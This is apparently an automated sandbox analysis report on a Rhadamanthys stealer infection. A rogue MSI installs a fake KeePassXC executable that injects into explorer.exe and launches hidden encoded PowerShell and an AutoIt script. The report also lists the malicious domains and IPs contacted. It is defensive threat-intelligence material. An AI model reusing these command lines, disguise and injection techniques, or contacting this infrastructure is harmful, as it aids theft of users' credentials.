Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\IconSize = "48" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\LogicalViewMode = "1" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\systemcpl.dll,-1#immutable1 = "System" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{D674391B-52D9-4E07-834E-67C98610F39D}\IconSize = "16" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-2#immutable1 = "Change user account settings and passwords for people who share this computer." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\devmgr.dll,-5#immutable1 = "View and update your device hardware settings and driver software." C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\sdcpl.dll,-101#immutable1 = "Backup and Restore (Windows 7)" C:\Windows\explorer.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3996 wrote to memory of 3244 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3996 wrote to memory of 3244 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3996 wrote to memory of 3244 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 3244 wrote to memory of 4584 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3244 wrote to memory of 4584 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3244 wrote to memory of 4584 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3996 wrote to memory of 3492 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
PID 3996 wrote to memory of 3492 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
PID 3996 wrote to memory of 3492 N/A C:\Windows\system32\msiexec.exe C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe
PID 3492 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe
PID 3492 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe
PID 3492 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe
PID 3492 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe
PID 1988 wrote to memory of 4028 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 4028 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1988 wrote to memory of 2844 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 1988 wrote to memory of 2844 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 1988 wrote to memory of 2844 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 2796 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe
PID 2844 wrote to memory of 2796 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe
PID 2844 wrote to memory of 2796 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe
PID 2796 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe \??\c:\st\Autoit3.exe
PID 2796 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe \??\c:\st\Autoit3.exe
PID 2796 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe \??\c:\st\Autoit3.exe
PID 4548 wrote to memory of 2444 N/A \??\c:\st\Autoit3.exe \??\c:\windows\SysWOW64\cmd.exe
PID 4548 wrote to memory of 2444 N/A \??\c:\st\Autoit3.exe \??\c:\windows\SysWOW64\cmd.exe
PID 4548 wrote to memory of 2444 N/A \??\c:\st\Autoit3.exe \??\c:\windows\SysWOW64\cmd.exe
PID 2444 wrote to memory of 1496 N/A \??\c:\windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2444 wrote to memory of 1496 N/A \??\c:\windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2444 wrote to memory of 1496 N/A \??\c:\windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\Wbem\WMIC.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 51A3AC4FF8095876459BB49781BDF4DF

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss3BD3.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi3BD0.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr3BD1.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr3BD2.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe

"C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe"

C:\Windows\SysWOW64\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle hidden -e [encoded command omitted]

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3492 -ip 3492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 964

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe"

C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe

"C:\Users\Admin\AppData\Local\Temp\HJJEGIEHIJ.exe"

\??\c:\st\Autoit3.exe

"c:\st\Autoit3.exe" c:\st\script.a3x

\??\c:\windows\SysWOW64\cmd.exe

"c:\windows\system32\cmd.exe" /c wmic ComputerSystem get domain > C:\ProgramData\bakfgfa\ffcfhbc

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic ComputerSystem get domain

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 not-pass.com udp
US 172.67.219.67:80 not-pass.com tcp
US 172.67.219.67:443 not-pass.com tcp
US 8.8.8.8:53 67.219.67.172.in-addr.arpa udp
US 8.8.8.8:53 gachi-lane.com udp
US 172.67.172.142:80 gachi-lane.com tcp
US 8.8.8.8:53 142.172.67.172.in-addr.arpa udp
US 8.8.8.8:53 raur94.com udp
US 172.67.195.205:80 raur94.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 172.67.195.205:443 raur94.com tcp
US 8.8.8.8:53 opensun.monster udp
US 172.67.160.176:443 opensun.monster tcp
US 8.8.8.8:53 205.195.67.172.in-addr.arpa udp
US 8.8.8.8:53 176.160.67.172.in-addr.arpa udp
US 8.8.8.8:53 checkass.monster udp
US 172.67.129.199:443 checkass.monster tcp
US 8.8.8.8:53 199.129.67.172.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
NL 194.55.186.13:80 194.55.186.13 tcp
US 8.8.8.8:53 13.186.55.194.in-addr.arpa udp
US 8.8.8.8:53 dintrinnssports.shop udp
US 104.21.2.232:80 dintrinnssports.shop tcp
US 8.8.8.8:53 232.2.21.104.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp

Files

C:\Windows\Installer\MSI3856.tmp

C:\Windows\Installer\MSI3A2F.tmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_adehlmyp.ihz.ps1

C:\Users\Admin\AppData\Local\Temp\pss3BD3.ps1

C:\Users\Admin\AppData\Local\Temp\scr3BD1.ps1

C:\Users\Admin\AppData\Local\Temp\msi3BD0.txt

C:\Config.Msi\e5737cc.rbs

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgcc_s_dw2-1.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Core.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libdouble-conversion.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libzstd.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libpng16-16.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libpcre2-16-0.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libicuuc68.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libharfbuzz-0.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libicuin68.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgpg-error-0.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libwinpthread-1.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\zlib1.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Widgets.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libykpers-1-1.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libsodium-23.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libquazip5.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Network.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Svg.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Gui.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\Qt5Concurrent.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libqrencode.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libgcrypt-20.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libstdc++-6.dll

C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\libssp-0.dll

C:\Windows\Installer\e5737c9.msi

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-01 21:53

Reported

2024-06-01 22:11

Platform

win11-20240508-en

Max time kernel

91s

Max time network

136s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1080 created 2064 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\sihost.exe

Command and Scripting Interpreter: PowerShell

execution

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1496 set thread context of 1080 N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe C:\Windows\SysWOW64\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\e574100.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI42A7.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI42C9.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI5598.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e574104.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF897ACE000E9856D6.TMP C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e574100.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DF4508B638EFDABC96.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI42F9.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{BFB3A06C-96C7-42C4-A90F-78C892A36FF8} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFC3EF3208FE0EAA83.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI41DB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI42E9.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\SystemTemp\~DFCE8E4D867C59CEE8.TMP C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI42B8.tmp C:\Windows\system32\msiexec.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Voiajf Public\TruoApp\KeePassXc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
